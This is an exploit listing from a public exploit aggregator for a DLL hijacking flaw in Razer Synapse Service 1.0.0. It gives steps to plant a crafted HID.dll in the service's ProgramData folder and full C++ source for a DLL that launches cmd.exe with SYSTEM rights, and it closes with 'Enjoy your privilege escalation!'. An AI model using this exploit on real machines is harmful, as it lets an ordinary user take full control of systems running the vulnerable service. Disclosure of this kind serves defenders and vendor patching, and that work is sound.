Exploit for Razer Synapse Service 1.0.0 DLL Injection

Name: Exploit for Razer Synapse Service 1.0.0 DLL Injection
Rating: 5 (119 reviews)
2020-03-18 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:156800
Discovered by: Juan Sacco <jsacco@exploitpack.com>  
Razer Synapse Service v1.0.0 is prone to a DLL Injection because it  
fails to properly filter user supplied input and loads a .DLL from  
%ProgramData% from userland with SYSTEM rights allowing to escalate  
the priveleges from a regular user to SYSTEM rights.  
  
Program: Raze Synapse Service  
Version: 1.0.0  
Vendor: https://www.razer.com/  
Download link: https://www.razer.com/downloads  
  
Steps To Reproduce:  
Move your .DLL to C:\ProgramData\Razer\Synapse3\Service\Bin\HID.dll  
Restart the PC or restart the service. The service runs with SYSTEM rights.  
Enjoy your privilege escalation!  
  
Supporting Material/References:  
ProgramData specifies the path to the program-data folder (normally  
C:\ProgramData). Unlike the Program Files folder, this folder can be  
used by applications to store data for standard users, because it does  
not require elevated permissions. Reference:  
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/ff716245(v=win.10)?redirectedfrom=MSDN#feedback  
  
Razer Synaprse Service.exe loads a DLL ( HID.dll ) from  
ProgramData\Razer\Synapse3\Service\ folder with the function:  
"HidD_GetHidGuid()" using the following code we can compile a DLL and  
export this function from it to being called during attach.  
  
// dllmain.cpp : Defines the entry point for the DLL application.  
include "pch.h"  
include "windows.h"  
BOOL APIENTRY DllMain( HMODULE hModule,  
DWORD ul_reason_for_call,  
LPVOID lpReserved  
)  
{  
char cmd[] = "cmd.exe /c";  
switch (ul_reason_for_call)  
{  
case DLL_PROCESS_ATTACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
case DLL_THREAD_ATTACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
case DLL_THREAD_DETACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
case DLL_PROCESS_DETACH:  
WinExec(cmd, SW_SHOWNORMAL);  
ExitProcess(0);  
break;  
}  
return TRUE;  
}  
  
extern "C" __declspec(dllexport) void HidD_GetHidGuid()  
{  
char cmd[] = "cmd.exe /c";  
WinExec(cmd, SW_SHOWNORMAL);  
}  
  
Impact  
A regular user could abuse of this vulnerability to gain full SYSTEM rights.